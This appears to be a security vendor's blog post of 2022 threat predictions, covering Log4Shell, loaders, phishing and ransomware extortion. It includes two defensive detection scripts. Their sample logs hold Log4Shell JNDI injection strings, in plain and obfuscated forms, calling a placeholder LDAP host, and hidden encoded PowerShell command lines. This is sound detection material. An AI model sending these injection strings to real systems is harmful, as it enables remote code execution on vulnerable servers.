Cybersecurity is a fast-moving industry. In 2021 we saw several high-profile ransomware attacks that impacted global supply chains, such as attacks on Colonial Pipeline and JBS.
2021 went out with a bang, as several critical Log4j vulnerabilities were discovered. The impact of those vulnerabilities will likely extend into 2022.
Matthew Warner, CTO and Co-Founder of Blumira, and Aviv Grafi, CTO and Co-Founder of Votiro, offered their cybersecurity predictions for 2022.
Unfortunately the Log4j vulnerabilities (aka Log4Shell) discovered in December presented a prime opportunity for threat actors. Sure enough, Conti had developed a holistic attack chain using Log4j as an access point only a week after the initial vulnerability was discovered.
For opportunistic ransomware groups that operate quickly with purely financial motivations, Log4j is a low-hanging fruit to gain access into an environment.
“We’re going to see ransomware operators leverage [Log4j] to just see what they can get,” said Matt Warner, CTO and Co-Founder of Blumira. “More advanced ransomware operators leverage it in really interesting ways to get deeper into new environments.”
Log4Shell is not only one of the easiest remote code execution (RCE) vulnerabilities that we’ve seen in the past few years, but it’s also the most widespread, said Aviv Grafi, CTO and Co-Founder of Votiro.
Since Log4j is a common logging library used in countless applications, it’s inherently difficult for IT administrators to ensure their organization is properly patched and protected. That’s why detection is the best way to stay protected against Log4j-related attacks.
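Because patch coverage for a library as widely embedded as Log4j is hard to prove, the practical control is to watch the logs that Log4j itself writes from. The scanner below is an added example, not Blumira's or Votiro's code; it runs over a handful of constructed web-server log lines (placeholder TEST-NET addresses) and flags lookup strings after undoing the obfuscations that defeat a plain substring match: URL encoding, nested `${lower:…}`/`${upper:…}` lookups, and `${…:-x}` default-value tricks. The regexes and the normalisation depth are assumptions of this example, tuned for readability rather than completeness.

```python
import re
import urllib.parse

# A Log4j lookup that names the JNDI handler is the core indicator.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# ${lower:j} / ${upper:J} evaluate to a single character; keep only that character.
NESTED_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^}]*)\}", re.IGNORECASE)
# ${::-j} and ${env:NOSUCHVAR:-j} evaluate to the default after ":-"; keep only that.
DEFAULT_RE = re.compile(r"\$\{[^{}:]*:(?:[^{}:]*:)*-([^{}]*)\}")


def normalise(text: str, rounds: int = 5) -> str:
    """Collapse common lookup obfuscations so a hidden '${jndi:' becomes visible.

    Innermost lookups are rewritten first because the regexes exclude '{' from the
    lookup body; repeating a few rounds handles lookups nested inside lookups.
    """
    text = urllib.parse.unquote(text)          # %24%7Bjndi%3A -> ${jndi:
    for _ in range(rounds):
        before = text
        text = NESTED_RE.sub(lambda m: m.group(1), text)
        text = DEFAULT_RE.sub(lambda m: m.group(1), text)
        if text == before:                     # nothing left to unwrap
            break
    return text


def scan_log(lines):
    """Return (line_number, normalised_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        cleaned = normalise(line)
        if JNDI_RE.search(cleaned):
            hits.append((n, cleaned))
    return hits


# Constructed sample access-log lines (not real traffic). Lines 2-5 carry the
# indicator in plain, nested, default-value and URL-encoded form; lines 1 and 6
# are benign, the last one deliberately using an unrelated Log4j lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/a}"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://198.51.100.7/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7/a}"',
    '203.0.113.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 400 "-"',
    '203.0.113.10 - - "GET /${date:yyyy-MM-dd} HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for n, cleaned in scan_log(SAMPLE_LOG):
        print(f"line {n}: {cleaned}")
```

A hit tells you only that someone sent a lookup string; whether the application resolved it is a separate question answered by outbound LDAP/RMI connections from the host, which is the second signal worth correlating in a SIEM.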
A malware loader is malicious code whose job is to retrieve additional executable payloads and run them on a compromised machine. In late 2021, we saw the emergence of SquirrelWaffle in the wild, a loader that drops malware like Qakbot or the pentesting tool Cobalt Strike.
SquirrelWaffle campaigns typically rely on emails with malicious hyperlinks or attachments that run obfuscated malware-retrieving code when opened.
The advice around preventing ransomware rarely changes: understand the cyber kill chain and ensure that you have the tools to detect behaviors associated with each stage. It’s important to deploy basic security fundamentals, such as endpoint detection and response (EDR) and multi-factor authentication.
“What really changes is the ability of the attackers and the quality of techniques that they’re using, and how they leverage them together,” said Warner.
Security and IT teams must prioritize monitoring for behaviors associated with new malware and ransomware campaigns, such as process pivoting within Windows environments. Capturing syslog data and process creation logs can help with that.
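The "process pivoting" worth watching for is visible in process creation logs as unusual parent-child pairs: an Office application handing off to a script host, a script host with download-style arguments, or a script host launching a signed system binary to run a dropped file. The rule set below is an added example rather than any of Blumira's actual detection rules; it reads constructed Sysmon-style process creation records (JSON, one per line, EventID 1) and reports which rule each record trips. The process names, argument fragments and sample command lines are assumptions chosen to illustrate the document-borne loader behaviour described above.

```python
import json
from dataclasses import dataclass
from typing import List

# Assumed rule vocabulary: productivity apps that should not spawn interpreters,
# the interpreters themselves, and system binaries often used to run dropped files.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line fragments more typical of a downloader than of an admin script.
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "downloadstring", "invoke-webrequest",
                   "-w hidden", "bypass")


@dataclass
class Finding:
    record: int     # 1-based line number in the input
    rule: str
    parent: str
    child: str


def image_name(path: str) -> str:
    """Lower-cased executable name from a Windows path, tolerant of '/' separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(record: int, event: dict) -> List[Finding]:
    """Apply the three parent/child rules to one process creation event."""
    if event.get("EventID") != 1:              # ignore anything that is not process creation
        return []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()
    findings = []
    if parent in OFFICE_APPS and child in (SCRIPT_HOSTS | LOLBINS):
        findings.append(Finding(record, "office_app_spawned_script_host", parent, child))
    if child in SCRIPT_HOSTS and any(tok in cmdline for tok in SUSPICIOUS_ARGS):
        findings.append(Finding(record, "script_host_suspicious_arguments", parent, child))
    if parent in SCRIPT_HOSTS and child in LOLBINS:
        findings.append(Finding(record, "script_host_spawned_lolbin", parent, child))
    return findings


def scan(lines) -> List[Finding]:
    """Parse each JSON line and collect findings; malformed lines are skipped, not fatal."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(evaluate(n, event))
    return findings


# Constructed sample records (not from a real host). Record 2 is the classic
# maldoc hand-off, 3 the hidden encoded stage, 4 a dropped DLL run via rundll32;
# the others are benign, a non-process event, and a corrupt line.
SAMPLE_EVENTS = [
    r'{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n invoice.docm"}',
    r'{"EventID": 1, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -w hidden -enc <base64-omitted>"}',
    r'{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -enc <base64-omitted>"}',
    r'{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Users\\Public\\update.dll,Start"}',
    r'{"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "DestinationPort": 443}',
    r'{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}',
    'not json at all',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record}: {f.rule} ({f.parent} -> {f.child})")
```

Each rule is deliberately narrow so that a single record can trip more than one; the value comes from seeing the chain (Office app, then script host, then system binary) across consecutive records on the same host, which is the correlation a SIEM adds on top of per-event matching.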
In the United States, 2022 is a midterm election year, which means that we’ll likely see phishing campaigns with political propaganda.
“We’ve seen a lot of growth around propaganda in ransomware attacks, and Covid helped to fuel that,” Warner said. “Propaganda makes phishing easier for attackers because it builds a narrative. It continues to be a flywheel for attacks to build up that logic and say, ‘Here’s how we can attack people with phishing.’”
Phishing campaigns in 2022 will likely be embedded with political language; for example, an email with the subject line ‘5 things you haven’t heard about your favorite candidate’ that encourages victims to click on malicious links or attachments.
“People are emotionally driven, and political propaganda can trigger emotion that would drive a person to click on something,” Grafi said. “That’s an extremely valuable tool for an attacker.”
Twenty years ago, attribution and extortion were less of a concern because platforms for sharing or selling stolen data did not exist as they do today. Now, ransomware is much more focused on blackmailing victims, getting data and doing more with that data.
“What we’ve learned in the last 20 years is that there’s value to that data that attackers will take advantage of,” Warner said.
That’s why small municipalities, local governments and schools are the unfortunate victims of the bystander effect; these entities often have valuable data that ransomware operators are after. These sectors will continue to be attractive targets for cybercrime in 2022.
“Securing environments against these attacks requires broad visibility and risk mitigation efforts that are difficult for organizations of all sizes to keep up with — especially organizations with tighter budgets and smaller IT teams,” Warner said.
In 2022, ransomware operators will continue to employ double extortion — the tactic of encrypting all data and threatening to publish that data to pressure companies to pay the ransom. The natural evolution of holding data for ransom is blackmail over data exposure. This is one of the main reasons that paying the ransom is almost never a good idea and should be avoided at all costs.
“Expecting integrity from criminals is a dangerous game,” Warner added.
2021 set a record for the number of vulnerabilities reported in a single year, according to the US-CERT Vulnerability Database. From multiple Log4j vulnerabilities to HiveNightmare and PrintNightmare, critical vulnerabilities just kept coming throughout the year.
Even worse, 90% of all CVEs discovered in 2021 can be exploited by attackers with little technical skill, according to Redscan Labs.
Unfortunately, that is unlikely to slow down in 2022, both because of an increased focus on cybersecurity research and because more software inevitably means more bugs.
But most vulnerabilities will likely be found in legacy code, mainly because developers twenty or thirty years ago lacked the secure coding tools and processes available today.
“Every year we have the conversation, ‘Maybe that will be the last holy grail vulnerability.’ And we always get surprised to see more,” Grafi said. “I think we’ll continue to be surprised.”
No one has a crystal ball, but we can say with near certainty that cyberattacks will continue to have an impact on organizations of all sizes in 2022.
It’s nearly impossible to keep up with the evolving tactics of threat actors. That’s why Blumira performs threat hunting on your behalf, helping you stay protected by monitoring, detecting and responding to behaviors associated with cyberattacks such as ransomware and malware. Our incident detection engineers constantly develop detection rules based on known attacker techniques and automatically deploy them in Blumira’s cloud SIEM platform.
To get started, try Blumira for free or request a demo.